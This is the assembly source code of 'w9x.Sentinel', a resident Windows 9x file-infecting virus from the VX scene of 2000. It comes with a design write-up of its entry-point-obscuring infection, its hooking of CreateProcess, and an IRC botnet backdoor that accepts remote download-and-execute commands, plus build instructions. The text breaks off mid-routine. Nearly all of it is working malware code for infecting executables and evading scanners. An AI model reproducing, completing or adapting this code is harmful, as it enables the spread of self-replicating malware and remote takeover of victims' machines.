ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[SENTINEL.ASM]ÄÄÄ ;........................................................................; ;-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=; ; w9x.Sentinel 1.1 (c)oded 2000 by f0re ;-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=; ; ; Abstract ; -------- ; This is the sourcecode of my first resident w32 virus. It uses advanced ; EPO (entry point obscuring) and has backdoor capabilities via IRC. ; ; ; Virus Specification ; ------------------- ; When an infected file is executed the decryptor receives control and ; decrypts the virus with the decryption key on the stack (see EPO ; specification). Next the virus goes resident by using the vxdcall0 ; backdoor and hooks the CreateProcess api by modifying its address in the ; kernel32.dll export table in memory. ; ; When a new process is created the virus routine receives control and, if ; not already present, launches a new thread in which an IRC bot may be ; started (see IRC-BOT specification). Next it will try to infect the ; executed file. ; ; The infection procedure consists globally of the following steps. First ; it will search for a cavity in the file's code section and if one is ; found, it laces there the JumpVirus routine (see EPO specification). ; Second it will search for the nth call or jmp opcode in the code section ; to replace it with a call to this routine (again see EPO specification). ; Third it will copy the decryptor to the end of the file. Fourth it ; encrypts and copies the other portion of the virus to the file. The ; encryption key that is used is the offset of the returnaddress of the ; patched api call/jmp. Finally, after the file is infected, the original ; CreateProcess api code is executed. ; ; ; EPO specification ; --------------------- ; As already described, during infection the nth api call or (indirect) ; api jmp opcode in the code section of the file is replaced by a call ; to the JumpVirus routine (n is a random number). This routine was placed ; in a cavity somewhere in the code section. The JumpVirus routine holds ; the following 14 bytes of code: ; ; JumpVirusCode: ; xxxx = virtual address of JumpToVirusEntryPoint ; JumpToVirusEntryPoint: ; mov eax, [esp] ; add eax, delta ; jmp eax ; ; From the stack this routine takes the return address from the call. Next ; a precalculated number, called delta, (calculated during infection) is ; added which gives the virtual address of the virus entrypoint. After ; jumping to the virusdecryptor code the decryption key is taken from the ; stack (this is the return address from the call) and the viruscode can ; be decrypted. ; ; For a virusscanner it is now much harder to decrypt the virus; it first ; needs to find the return address of the api call or the address of the ; cavity and the size of the virus or both to be able to decrypt the ; virus. ; ; ; IRC BOT specification ; --------------------- ; When the IRC routine is launched, it will try to find an internet ; connection and if one is found, it launches an IRC BOT, ***a sentinel*** ; which goes to undernet #sntnl. There it will sit and wait for remote ; commands. The nickname of a sentinel consists of a randomly chosen name ; from a list of names followed by two random numbers. In the rest of ; this text the name of a sentinel is indicated by xxx. A sentinel can ; understand a number of commands which can be send to a sentinel ; privately or to all sentinels at once by sending the message to the ; channel. The following messages are understood: ; ; * all IRC commands, send with the following stucture: ; ; /msg xxx pass /<ircommand> <params> ; ; so for example: /msg xxx pass /privmsg #sntnl :hello there ; ; * the installer-command, send with the following structure: ; ; /msg xxx pass /ex3c [<ipnumber>] [<get-command>] ; ; where <ipnumber> = ip-number of server where executable should ; be downloaded. ; ; where <get-command> = the exact command according to the HTTP ; protocol to retrieve the file. ; ; So the command may for example look like: ; ; /msg xxx pass /ex3c [] [GET /filename.exe HTTP/1.0] ; ; If a sentinel receives this command it will download the ; specified file. Only when the it has succesfully received the ; entire file it will execute the file. ; ; * the status-command, send with the following structure: ; ; /msg xxx pass /st4t ; ; If a sentinel receives this command, it will show the status of ; the installer. Five different statuses are possible: ; ; Waiting/Unable to connect/Installing/Size error/Done ; ; * the quit-command, send with the following structure: ; ; /msg xxx pass /qu1t ; ; * the nick-command, send with the following structure: ; ; /msg xxx pass /n1ck ; ; This commands tells a sentinel to change its nick into a random ; 5 character long name. ; ; ; To Compile ; ---------- ; tasm32 sentinel.asm /m /ml ; tlink32 -aa sentinel.obj lib\import32.lib ; ; ; Greetz ; ------ ; Greetz go to (in random order): Blackjack, Darkman, MrSandman, Mdrg, ; Prizzy, Benny, rgo32, Asmod, Lord Julus, Spanska, DrOwlFS, Bumblebee, ; VirusBuster, LifeWire, Gbyte, r-, veedee, spo0ky, t00fic and last but ; not least all the other people from #virus/#vxers. ; ; ;""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""; .386 .model flat, stdcall locals jumps extrn ExitProcess:PROC include inc\myinc.inc include inc\wsocks.inc .data FirstCopy: jmp RealStart Start: mov eax, dword ptr [esp] ; decryption key pushad call GetCurrentOffset GetCurrentOffset: pop esi add esi, (RealStart - GetCurrentOffset) mov ecx, ((Leap - RealStart)/4 + 1) ; size to decrypt DecryptVirus: xor dword ptr [esi], eax ; decryption routine add esi, 04h loop DecryptVirus DecryptionDone: popad RealStart: push ebp call GetDeltaOffset GetDeltaOffset: pop ebp sub ebp, offset GetDeltaOffset SetSEH: lea eax, [ebp + ErrorHandler] ; set new SEH handler push eax push dword ptr fs:[0] ; save old SEH handler mov dword ptr fs:[0], esp ; initiate SEH frame CheckWindowsVersion: mov eax, [ebp + kernel32address] cmp word ptr [eax], 'ZM' jne ErrorHandler add eax, [eax + 3ch] cmp word ptr [eax], 'EP' jne ErrorHandler RestoreSEH: pop dword ptr fs:[0] ; restore old SEH add esp, 4 ; handler jmp MainRoutines ErrorHandler: mov esp, [esp + 8] pop dword ptr fs:[0] add esp, 4 jmp CheckEpoType MainRoutines: pushad call FIND_GETPROCADDRESS_API_ADDRESS call FIND_VXDCALL0_ADDRESS call FIND_USER32_BASE_ADDRESS call GO_RESIDENT popad CheckEpoType: cmp [ebp + epo_opcode], 15FFh jne EpoJmpExit EpoCallExit: mov eax, [ebp + epo_awaa_va] ; [eax]-> va original jmp pop ebp jmp [eax] EpoJmpExit: mov eax, [ebp + epo_awaa_va] ; [eax]-> va original jmp mov [esp + 4], eax pop ebp pop eax jmp [eax] ;==============================[ includes ]==============================; hookstruct db 20d dup(0) zip db "zip",0 delta dd 00h cs_rawsize dd 00h cavity_va dd 00h page_mem_size equ ((Leap-Start) + 0fffh)/1000h resaddress dd 0 kernel32address dd 0bff70000h user32address dd 0 wsock32address dd 0 imagehlpaddress dd 0 cp_oldapicodeaddress dd 0 cp_newapicodeaddress dd 0 cp_oldapicode db 06h dup(0) cp_newapicode db 06h dup(0) k32 db "KERNEL32.dll",0 user32 db "USER32.dll",0 imagehlp db "IMAGEHLP.dll",0 numberofnames dd 0 addressoffunctions dd 0 addressofnames dd 0 addressofordinals dd 0 AONindex dd 0 AGetProcAddress db "GetProcAddress", 0 AGetProcAddressA dd 0 AMessageBox db "MessageBoxA",0 AMessageBeep db "MessageBeep",0 AGetSystemTime db "GetSystemTime",0 AFindFirstFile db "FindFirstFileA",0 ACreateFile db "CreateFileA",0 ASetCurrentDirectory db "SetCurrentDirectoryA",0 ASetFileAttributes db "SetFileAttributesA",0 AGetFileAttributes db "GetFileAttributesA",0 ACreateFileMapping db "CreateFileMappingA",0 AMapViewOfFile db "MapViewOfFile",0 AUnmapViewOfFile db "UnmapViewOfFile",0 ACloseHandle db "CloseHandle",0 ASetFilePointer db "SetFilePointer",0 ASetEndOfFile db "SetEndOfFile",0 AGetModuleHandle db "GetModuleHandleA",0 ASetFileTime db "SetFileTime",0 ALoadLibrary db "LoadLibraryA",0 AGetSystemDirectory db "GetSystemDirectoryA",0 AGetWindowsDirectory db "GetWindowsDirectoryA",0 AGetFileSize db "GetFileSize",0 AGetCurrentDirectory db "GetCurrentDirectoryA",0 AVxdcall0A dd 0 ACheckSumMappedFile db "CheckSumMappedFile",0 filenamebuffer db 100h dup(0) maphandle dd 0 mapaddress dd 0 memory dd 0 imagebase dd 0 imagesize dd 0 filealign dd 0 sectionalign dd 0 filehandle dd 0 filesize dd 0 PEheader dd 0 ip_original dd offset OriginalHost windowtitle db "W9x.Sentinel", 0 msgtxt db "Observing the world f0revir", 0 myseh SEH <> myfinddata WIN32_FIND_DATA <> rva2raw dd 0 debug db 01 epo_newip dd 0 epo_cs_rva dd 0 epo_cs_pa dd 0 epo_ipnew_va dd 0 epo_ipnew_rva dd 0 epo_opcode dw 15ffh epo_aoc_pa dd 0 epo_awaa_va dd offset ip_original string db "ZZZZZZZZ", 0 ascvalues db "0123456789ABCDEF", 0 FIND_GETPROCADDRESS_API_ADDRESS proc LoadExportTableData: mov edi, [ebp + kernel32address] ; get exporttable add edi, [edi + 3ch] ; address from mov esi, [edi + 78h] ; kernel's PE header add esi, [ebp + kernel32address] mov eax, dword ptr [esi + 18h] mov [ebp + numberofnames], eax ; save number of names mov eax, dword ptr [esi + 1Ch] ; get ra of table with add eax, [ebp + kernel32address] ; pointers to funtion mov [ebp + addressoffunctions], eax ; addresses mov eax, dword ptr [esi + 20h] ; get ra of table with add eax, [ebp + kernel32address] ; pointers to names mov [ebp + addressofnames], eax ; of functions mov eax, dword ptr [esi + 24h] ; get ra of table with add eax, [ebp + kernel32address] ; pointers to ordinals mov [ebp + addressofordinals], eax ; of functions BeginProcAddressSearch: mov esi, [ebp + addressofnames] ; search for GetProc mov [ebp + AONindex], esi ; Address API in names mov edi, [esi] ; table add edi, [ebp + kernel32address] xor ecx, ecx lea ebx, [ebp + AGetProcAddress] TryAgain: mov esi, ebx MatchByte: cmpsb jne NextOne cmp byte ptr [esi], 0 ; did the entire string je GotIt ; match ? jmp MatchByte NextOne: inc cx add dword ptr [ebp + AONindex], 4 ; get next namepointer mov esi, [ebp + AONindex] ; in table (4 dwords) mov edi, [esi] add edi, [ebp + kernel32address] ; align with kernelbase jmp TryAgain GotIt: shl ecx, 1 mov esi, [ebp + addressofordinals] ; ordinal = nameindex * add esi, ecx ; size of ordinal entry xor eax, eax ; + ordinal table base mov ax, word ptr [esi] shl eax, 2 ; address of function = mov esi, [ebp + addressoffunctions] ; ordinal * size of add esi, eax ; entry of address mov edi, dword ptr [esi] ; table + base of add edi, [ebp + kernel32address] ; addresstable mov [ebp + AGetProcAddressA], edi ; save GPA address ret FIND_GETPROCADDRESS_API_ADDRESS endp FIND_VXDCALL0_ADDRESS proc FindStartOfKernelExportSection: mov esi, [ebp + kernel32address] add esi, dword ptr [esi + 3ch] mov edi, dword ptr [esi + 78h] ; virtual address of kernel32 add edi, [ebp + kernel32address] ; export section GetVXDCallAddress: mov esi, dword ptr [edi + 1Ch] ; get ra of table with add esi, [ebp + kernel32address] ; pointers to funtion addresses mov eax, dword ptr [esi] add eax, [ebp + kernel32address] mov [ebp + AVxdcall0A], eax ret FIND_VXDCALL0_ADDRESS endp GETAPI proc push eax push dword ptr [ebp + kernel32address] ; load kernelbase call [ebp + AGetProcAddressA] ; and get api address jmp eax ; call the api ret ; return GETAPI endp GETUAPI proc push eax push dword ptr [ebp + user32address] ; load user32base call [ebp + AGetProcAddressA] ; and get api address jmp eax ret GETUAPI endp GETWAPI proc push eax push dword ptr [ebp + wsock32address] ; load wsockbase call [ebp + AGetProcAddressA] ; and get api address jmp eax ret GETWAPI endp GETIAPI proc push eax push dword ptr [ebp + imagehlpaddress] call [ebp + AGetProcAddressA] jmp eax ret GETIAPI endp GO_RESIDENT proc CheckResidency: mov eax, [ebp + kernel32address] add eax, 400h cmp dword ptr [eax], 'er0f' je MemoryError ; already resident PageReserve: push 00020000h or 00040000h push page_mem_size push 80060000h push 00010000h call dword ptr [ebp + AVxdcall0A] cmp eax, 0FFFFFFFh je MemoryError mov [ebp + resaddress], eax CalculateVirusVirtualAddress: mov ecx, offset InterceptCP - Start add ecx, eax mov [ebp + cp_newapicodeaddress], ecx PageCommit: push 00020000h or 00040000h or 80000000h or 00000008h push 00000000h push 00000001h push page_mem_size shr eax, 12 push eax push 00010001h call dword ptr [ebp + AVxdcall0A] or eax, eax je MemoryError ; IN: hookstruct: ; 00 : offset api name ; 04 : old apicodeaddress ; 08 ; offset for old apicode ; 12 ; offset for new apicode ; 16 : new apicodeaddress lea eax, [ebp + hookstruct] lea ebx, [ebp + ACreateProcess] mov dword ptr [eax], ebx lea ebx, [ebp + cp_oldapicodeaddress] mov dword ptr [eax + 4], ebx lea ebx, [ebp + cp_oldapicode] mov dword ptr [eax + 8], ebx lea ebx, [ebp + cp_newapicode] mov dword ptr [eax + 12], ebx lea ebx, [ebp + cp_newapicodeaddress] mov dword ptr [eax + 16], ebx call HOOK_API CopyVirusToMemory: cld lea esi, [ebp + Start] mov edi, [ebp + resaddress] mov ecx, Leap-Start rep movsb SetResidentFlag: mov eax, [ebp + kernel32address] add eax, 400h shr eax, 12d ModifyPagePermissions2: push 20060000h push 00000000h push 00000001h push eax push 0001000dh call dword ptr [ebp + AVxdcall0A] cmp eax, 0FFFFFFFh je MemoryError mov eax, [ebp + kernel32address] add eax, 400h mov dword ptr [eax], 'er0f' MemoryError: ret GO_RESIDENT endp INFECT_FILE proc SetFileAttributesToNormal: push 80h lea esi, [ebp + myfinddata.fd_cFileName] ; esi = filename push esi lea eax, [ebp + ASetFileAttributes] call GETAPI OpenFile: push 0 ; template handle=0 push 20h ; attributes=any file push 3 ; type= existing file push 0 ; security option = 0 push 1 ; shared for read push 80000000h or 40000000h ; generic read write lea esi, [ebp + filenamebuffer] push esi ; offset file name lea eax, [ebp + ACreateFile] call GETAPI cmp eax, 0FFFFFFFFh je InfectionError mov [ebp + filehandle], eax ;-------------------------------[ map file ]---------------------------------; CreateFileMapping: ; allocates the memory push 0 ; filename handle = 0 push [ebp + memory] ; max size = memory push 0 ; minumum size = 0 push 4 ; read / write access push 0 ; sec. attrbs= default push [ebp + filehandle] lea eax, [ebp + ACreateFileMapping] call GETAPI ; eax = new map handle mov [ebp + maphandle], eax or eax, eax jz CloseFile MapViewOfFile: push [ebp + memory] ; memory to map push 0 ; file offset push 0 ; file offset push 2 ; file map write mode push eax ; file map handle lea eax, [ebp + AMapViewOfFile] ; ok map the file call GETAPI or eax, eax jz CloseMap mov [ebp + mapaddress], eax ; save that base CheckForMZMark: cmp word ptr [eax], 'ZM' ; an exe file? jne UnmapView CheckInfectionMark: cmp word ptr [eax + 38h], 'll' ; already infected? je UnmapView NotYetInfected: mov esi, dword ptr [eax + 3ch] cmp esi, 200h ja UnmapView add esi, eax cmp dword ptr [esi], 'EP' ; is it a PE file ? jne UnmapView mov [ebp + PEheader], esi ; save va PE header mov eax, [esi + 28h] mov [ebp + ip_original], eax ; save original ip mov eax, [esi + 34h] mov [ebp + imagebase], eax ; save imagebase ;------------------------------[ append section ]----------------------------; CheckForEPO: pushad mov [ebp + epo_opcode], 15FFh ; search for call opcode call CREATE_EPO or eax, eax jnz LocateBeginOfLastSection mov [ebp + epo_opcode], 25FFh call CREATE_EPO or eax, eax jnz LocateBeginOfLastSection popad jmp UnmapView LocateBeginOfLastSection: popad movzx ebx, word ptr [esi + 20d] ; optional header size add ebx, 24d ; file header size movzx eax, word ptr [esi + 6h] ; no of sections dec eax ; (we want the last-1 mov ecx, 28h ; sectionheader) mul ecx ; * header size add esi, ebx ; esi = begin of last add esi, eax ; section's header CheckForOverLays: mov eax, [esi + 10h] ; section phys size add eax, [esi + 14h] ; section phys offset mov ecx, [ebp + PEheader] mov ecx, [ecx + 38h] div ecx inc eax mul ecx mov ecx, [ebp + filesize] cmp ecx, eax ja UnmapView ; we dont infect those mov ecx, 08h CheckForZipSFX: lea edi, [ebp + zip] push ecx push esi mov ecx, 03h rep cmpsb pop esi pop ecx je UnmapView inc esi loop CheckForZipSFX ChangeLastSectionHeaderProperties: sub esi, 08h or dword ptr [esi + 24h], 00000020h or 20000000h or 80000000h NewAlignedPhysicalSize: mov eax, [esi + 8h] ; old virt size add eax, Leap-Start mov ecx, [ebp + PEheader] mov ecx, [ecx + 3ch] div ecx ; and align it to inc eax ; the filealign mul ecx mov [esi + 10h], eax ; save it NewAlignedVirtualSize: mov eax, [esi + 8h] ; get old push eax ; store it add eax, Leap-Start mov ecx, [ebp + PEheader] mov ecx, [ecx + 38h] div ecx ; and align it to inc eax ; the sectionalign mul ecx mov [esi + 8h], eax ; save new value NewAlignedImageSize: mov eax, dword ptr [esi + 0ch] ; get virtual offset add eax, dword ptr [esi + 8h] ; + new virtual size mov [ebp + imagesize], eax ; = new imagesize NewAlignedFileSize: mov eax, dword ptr [esi + 10h] ; get new phys size add eax, dword ptr [esi + 14h] ; add offset of phys mov [ebp + filesize], eax ; size = filesize CalculateNewIp: pop eax push eax add eax, dword ptr [esi + 0ch] ; + virtual offset mov [ebp + epo_ipnew_rva], eax ; new ip CreateEpoIp: add eax, [ebp + imagebase] mov [ebp + epo_ipnew_va], eax CalculateEncryptionKey: mov ebx, [ebp + epo_aoc_pa] sub ebx, [ebp + epo_cs_pa] add ebx, [ebp + epo_cs_rva] add ebx, 04h ; ebx-> original return address add ebx, [ebp + imagebase] ; after call = encryption key CalculateDelta: mov eax, [ebp + epo_ipnew_va] sub eax, ebx mov [ebp + delta], eax CopyVirusDecryptorToEndOfFile: pop eax mov edi, eax ; virtual size add edi, [ebp + mapaddress] ; mapaddress add edi, [esi + 14h] ; add raw data offset lea esi, [ebp + Start] ; copy virus mov ecx, (RealStart - Start) rep movsb PrepareToEncryptAndCopy: mov ecx, ((Leap-RealStart)/4 + 1) cld EncryptAndCopyVirus: movsd sub edi, 04h xor dword ptr [edi], ebx add edi, 04h loop EncryptAndCopyVirus SearchForCavity: mov esi, [ebp + epo_cs_pa] mov ecx, [ebp + cs_rawsize] call CAVITYSEARCH or esi, esi jz UpdatePEHeaderWithChanges mov eax, esi sub eax, [ebp + epo_cs_pa] add eax, [ebp + epo_cs_rva] add eax, [ebp + imagebase] mov [ebp + cavity_va], eax WriteVirusJumpIntoCavity: add eax, 04h mov dword ptr [esi], eax add esi, 04h mov dword ptr [esi], 0524048Bh add esi, 04h mov eax, [ebp + delta] mov dword ptr [esi], eax add esi, 04h mov word ptr [esi], 0E0FFh SetEpo: mov eax, [ebp + cavity_va] mov edx, [ebp + epo_aoc_pa] mov dword ptr [edx], eax sub edx, 02h mov word ptr [edx], 15FFh ; turn jmp into call UpdatePEHeaderWithChanges: mov esi, [ebp + mapaddress] mov word ptr [esi + 38h], 'll' ; set infectionmark mov esi, [ebp + PEheader] mov eax, [ebp + imagesize] mov [esi + 50h], eax ; set new imagesize CalculateNewCheckSum: cmp dword ptr [esi + 58h], 00h je UnmapView LoadImageHlpDll: lea eax, [ebp + imagehlp] push eax lea eax, [ebp + ALoadLibrary] call GETAPI or eax, eax jz UnmapView mov [ebp + imagehlpaddress], eax CalculateNewChecksum: mov esi, [ebp + PEheader] push dword ptr [esi + 58h] lea eax, [ebp + buffer] push eax push dword ptr [ebp + filesize] push dword ptr [ebp + mapaddress] lea eax, [ebp + ACheckSumMappedFile] call GETIAPI ;--------------------------------[ unmap file ]------------------------------; UnmapView: push dword ptr [ebp + mapaddress] lea eax, [ebp + AUnmapViewOfFile] call GETAPI CloseMap: push dword ptr [ebp + maphandle] lea eax, [ebp + ACloseHandle] call GETAPI push 0 ; set file pointer to push 0 ; beginning + filesize push [ebp + filesize] ; = end of file push [ebp + filehandle] lea eax, [ebp + ASetFilePointer] call GETAPI push [ebp + filehandle] ; set EOF equal to current lea eax, [ebp + ASetEndOfFile] ; filepointer position call GETAPI ;--------------------------------[ close file ]------------------------------; CloseFile: push dword ptr [ebp + myfinddata.fd_ftLastWriteTime] push dword ptr [ebp + myfinddata.fd_ftLastAccessTime] push dword ptr [ebp + myfinddata.fd_ftCreationTime] push dword ptr [ebp + filehandle] lea eax, [ebp + ASetFileTime] call GETAPI push [ebp + filehandle] lea eax, [ebp + ACloseHandle] call GETAPI InfectionError: push dword ptr [ebp + myfinddata.fd_dwFileAttributes] lea eax, [ebp + myfinddata.fd_cFileName] push eax lea eax, [ebp + ASetFileAttributes] call GETAPI ret INFECT_FILE endp RESIDENT_CP proc InterceptCP: pushad call GetApiDelta GetApiDelta: pop ebp sub ebp, offset GetApiDelta call FIND_GETPROCADDRESS_API_ADDRESS call FIND_USER32_BASE_ADDRESS call RESIDENT_CP2 call IRC_LAUNCH popad GetNewDelta: call NewDelta NewDelta: pop eax sub eax, offset NewDelta RestoreApiCode: pushad mov edi, [eax + cp_oldapicodeaddress] lea esi, [eax + cp_oldapicode] mov ecx, 06h rep movsb popad pop [eax + returnaddress] call dword ptr [eax + cp_oldapicodeaddress] ReHookApi: pushad call GetNewDelta2 GetNewDelta2: pop ebp sub ebp, offset GetNewDelta2 mov edi, [ebp + cp_oldapicodeaddress] lea esi, [ebp + cp_newapicode] mov ecx, 06h rep movsb popad ReturnToOriginalCaller: db 68h returnaddress dd 0 ret RESIDENT_CP endp RESIDENT_CP2 proc CheckForEmptyCommandLine: mov esi, dword ptr [esp + 2ch] or esi, esi jz Continue ExtractFileName: xor ecx, ecx cmp byte ptr [esi], '"' jne FileNameNormal inc esi push esi GetFileNamePartBetweenQuotes: cmp byte ptr [esi], '"' je GetBetweenQuotes inc esi inc ecx cmp ecx, 100h ja FileNameEndNotFound jmp GetFileNamePartBetweenQuotes GetBetweenQuotes: mov edi, esi pop esi sub edi, esi ; esi hold start of filename mov ecx, edi ; ecx holds size of filename jmp StoreFileName FileNameNormal: push esi GetNormalFileName: cmp byte ptr [esi], ' ' je FoundNormalFileName inc esi inc ecx cmp ecx, 100h ja FileNameEndNotFound jmp GetNormalFileName FoundNormalFileName: mov edi, esi pop esi sub edi, esi ; esi hold start of filename mov ecx, edi ; ecx holds size of filename jmp StoreFileName FileNameEndNotFound: pop esi jmp Continue StoreFileName: push edi push esi push ecx mov ecx, 100h xor eax, eax lea edi, [ebp + filenamebuffer] rep stosb pop ecx pop esi pop edi lea edi, [ebp + filenamebuffer] rep movsb CheckForRem: lea esi, [ebp + filenamebuffer] cmp word ptr [esi], 'er' jne FindFirstFile inc esi cmp word ptr [esi], 'me' je Continue FindFirstFile: lea eax, [ebp + myfinddata] ; win32 finddata structure push eax lea eax, [ebp + filenamebuffer] push eax lea eax, [ebp + AFindFirstFile] ; find the file call GETAPI cmp eax, 0FFFFFFFFh ; file was not found je Continue cmp [ebp + debug], 00h je InfectThisFile xor ecx, ecx lea esi, [ebp + myfinddata.fd_cFileName] CheckFileName: cmp byte ptr [esi], 0 je Continue cmp dword ptr [esi], 'mmud' je InfectThisFile inc esi inc ecx cmp ecx, 100h ja Continue jmp CheckFileName InfectThisFile: mov ecx, [ebp + myfinddata.fd_nFileSizeLow] ; ecx = filesize mov [ebp + filesize], ecx ; save the filesize add ecx, Leap - Start + 1000h ; filesize + virus mov [ebp + memory], ecx ; + workspace = memory call INFECT_FILE Continue: ret RESIDENT_CP2 endp HOOK_API proc ; IN: hookstruct: ; 00 : offset api name ; 04 : old apicodeaddress ; 08 ; offset for old apicode ; 12 ; offset for new apicode ; 16 : new apicodeaddress FindKernelExportTable: pushad mov edi, [ebp + kernel32address] add edi, dword ptr [edi + 3ch] mov esi, dword ptr [edi + 78h] add esi, [ebp + kernel32address] GetNecessaryData: mov eax, dword ptr [esi + 18h] add eax, [ebp + kernel32address] mov [ebp + numberofnames], eax ; save number of names mov eax, dword ptr [esi + 1Ch] ; get ra of table with add eax, [ebp + kernel32address] mov [ebp + addressoffunctions], eax ; function addresses mov eax, dword ptr [esi + 20h] ; get ra of table with add eax, [ebp + kernel32address] mov [ebp+addressofnames], eax ; pointers to names mov eax, dword ptr [esi + 24h] ; get ra of table with add eax, [ebp + kernel32address] mov [ebp+addressofordinals], eax ; pointers to ordinals BeginApiAddressSearch: mov esi, [ebp + addressofnames] ; search for mov [ebp + AONindex], esi ; API in names mov edi, [esi] ; table add edi, [ebp + kernel32address] HookCreateProcess: xor ecx, ecx OkTryAgain: lea ebx, [ebp + hookstruct] mov esi, dword ptr [ebx] MatchByteNow: cmpsb jne NextOneNow cmp byte ptr [esi], 0 ; did the entire string je YesGotIt ; match ? jmp MatchByteNow NextOneNow: inc cx add dword ptr [ebp + AONindex], 4 ; get next namepointer mov esi, [ebp + AONindex] ; in table (4 dwords) mov edi, [esi] add edi, [ebp + kernel32address] jmp OkTryAgain YesGotIt: shl ecx, 1 mov esi, [ebp + addressofordinals] ; ordinal = nameindex * add esi, ecx ; size of ordinal entry xor eax, eax ; + ordinal table base mov ax, word ptr [esi] ; offset of address shl eax, 2 ; of function = ordinal mov esi, [ebp + addressoffunctions] ; * size of entry of add esi, eax ; address table mov edi, dword ptr [esi] ; get address add edi, [ebp + kernel32address] lea eax, [ebp + hookstruct] mov eax, dword ptr [eax + 4] mov dword ptr [eax], edi SetApiHook: mov eax, edi shr eax, 12d ModifyPagePermissions: push 20060000h push 00000000h push 00000001h push eax push 0001000dh call dword ptr [ebp + AVxdcall0A] cmp eax, 0FFFFFFFh jne SaveCreateProcessApiCode xor eax, eax jmp ApiHookError SaveCreateProcessApiCode: lea esi, [ebp + hookstruct] mov esi, dword ptr [esi + 4] mov esi, dword ptr [esi] lea edi, [ebp + hookstruct] mov edi, dword ptr [edi + 8] mov ecx, 06h rep movsb PrepareCreateProcessApiCode: lea esi, [ebp + hookstruct] mov esi, dword ptr [esi + 12] mov byte ptr [esi], 68h inc esi lea eax, [ebp + hookstruct] mov eax, dword ptr [eax + 16] mov eax, dword ptr [eax] mov dword ptr [esi], eax add esi, 04h mov byte ptr [esi], 0c3h ChangeCreateProcessApiCode: lea edi, [ebp + hookstruct] mov edi, dword ptr [edi + 4] mov edi, dword ptr [edi] lea esi, [ebp + hookstruct] mov esi, dword ptr [esi + 12] mov ecx, 06h rep movsb ApiHookError: popad ret HOOK_API endp CREATE_EPO proc LocateCodeSectionHeader: mov eax, [ebp + ip_original] call FIND_SECTION or eax, eax jz ExitEpoRoutine ; edi = start of code section header GetPointerToRawData: mov eax, dword ptr [edi + 12d] ; eax = rva cs mov [ebp + epo_cs_rva], eax mov ecx, dword ptr [edi + 16d] ; raw size of code section mov [ebp + cs_rawsize], ecx mov edx, dword ptr [edi + 20d] ; RVA to raw data of code section add edx, [ebp + mapaddress] mov [ebp + epo_cs_pa], edx mov esi, edx mov eax, [ebp + ip_original] mov edx, [ebp + epo_cs_rva] sub eax, edx add esi, eax sub ecx, eax ; esi = physical address to raw data of code section ; ecx = size of raw data of code section ScanForOpcode: lodsw dec esi cmp word ptr [ebp + epo_opcode], ax je FoundOpcode loop ScanForOpcode xor eax, eax ; eax = 0 = error jmp ExitEpoRoutine ; not found FoundOpcode: dec ecx push esi push ecx inc esi ; esi = physical address of [xxxx] in code section ExamineAddress: mov [ebp + epo_aoc_pa], esi ; address of call mov eax, dword ptr [esi] mov [ebp + epo_awaa_va], eax ; address where api address ;pushad ;call MSG_BEEP ;popad ; on stack: esi, ecx GetRVAImportTable: mov esi, [ebp + PEheader] mov eax, [esi + 80h] ; rva of import table call FIND_SECTION or eax, eax jz NotFound ; edx = va of import section ; ecx = size of import section ; on stack: esi, ecx CompareAddressToImportAddress: mov esi, [ebp + epo_awaa_va] cmp edx, esi jb CheckNotAbove jmp NotFound CheckNotAbove: add edx, ecx cmp edx, esi ja FoundGoodInsertionPoint NotFound: pop ecx pop esi jmp ScanForOpcode FoundGoodInsertionPoint: mov eax, 0ah call GET_RANDOM_NUMBER_WITHIN cmp eax, 3h ja NotFound pop ecx pop esi mov eax, 01h ; eax == 0 -> error ; eax == 1 -> found ExitEpoRoutine: ret CREATE_EPO endp FIND_USER32_BASE_ADDRESS proc GetUser32Base: lea eax, [ebp + user32] push eax lea eax, [ebp + ALoadLibrary] call GETAPI mov [ebp + user32address], eax ret FIND_USER32_BASE_ADDRESS endp FIND_WSOCK32_BASE_ADDRESS proc LoadWsock32: lea eax, [ebp + wsock32] ; not found, then push eax ; load the dll lea eax, [ebp + ALoadLibrary] ; first call GETAPI mov [ebp + wsock32address], eax ret FIND_WSOCK32_BASE_ADDRESS endp FIND_SECTION proc ; In: eax - rva somewhere in section ; Out: edx - va of section start ; Out: ecx - size of section ; out: edi - va of section header FindFirstSectionHeader: mov esi, [ebp + mapaddress] add esi, dword ptr [esi + 3ch] ; esi=offset peheader movzx ecx, word ptr [esi + 06h] ; ecx = nr. of sections movzx edi, word ptr [esi + 20d] ; optional header size add esi, 24d ; file header size add edi, esi ; edi points to first section header FindCorrespondingSection: push eax mov edx, dword ptr [edi + 12d] ; section RVA sub eax, edx cmp eax, dword ptr [edi + 08d] ; section size jb SectionFound NotThisSection: pop eax add edi, 40d loop FindCorrespondingSection EndSectionSearch: xor eax, eax ret SectionFound: pop eax mov edx, dword ptr [edi + 12d] add edx, [ebp + imagebase] mov ecx, dword ptr [edi + 08d] ret FIND_SECTION endp GET_RANDOM_NUMBER proc push eax ebx lea eax, [ebp + AGetTickCount] call GETAPI lea ebx, [ebp + random_number] ; EBX = pointer to random_number mul dword ptr [ebx] ; Multiply previous miliseconds with sbb edx,eax ; Add low-order word of 32-bit random cmc ; Complement carry flag adc [ebx],edx ; Store 32-bit random number pop ebx eax ret GET_RANDOM_NUMBER endp GET_RANDOM_NUMBER_WITHIN proc push ebx call GET_RANDOM_NUMBER xchg eax,ebx ; EBX = number in range xor eax,eax ; Zero EAX xchg eax,edx ; EDX = 32-bit random number div ebx ; EAX = random number within range pop ebx xchg eax, edx ret GET_RANDOM_NUMBER_WITHIN endp CAVITYSEARCH proc ;----------------------------------------------------------------------------- ; Cavity search engine by Benny and Darkman of 29A ; ; Calling parameters: ; ECX = size of search area ; ESI = pointer to search area ; ; Return parameters: ; ESI = pointer to cave CSE: pushad mov ebp, 14d ; EBP = size of cave wanted lodsb ; AL = byte within search area reset_cavity_loop: xchg eax,ebx ; BL = " " " " xor edx,edx ; Zero EDX dec ecx ; Decrease counter cmp ecx,ebp ; Unsearched search area large enough? jb no_cave_found ; Below? Jump to no_cave_found find_cave_loop: lodsb ; AL = byte within search area cmp al,bl ; Current byte equal to previous byte? jne reset_cavity_loop 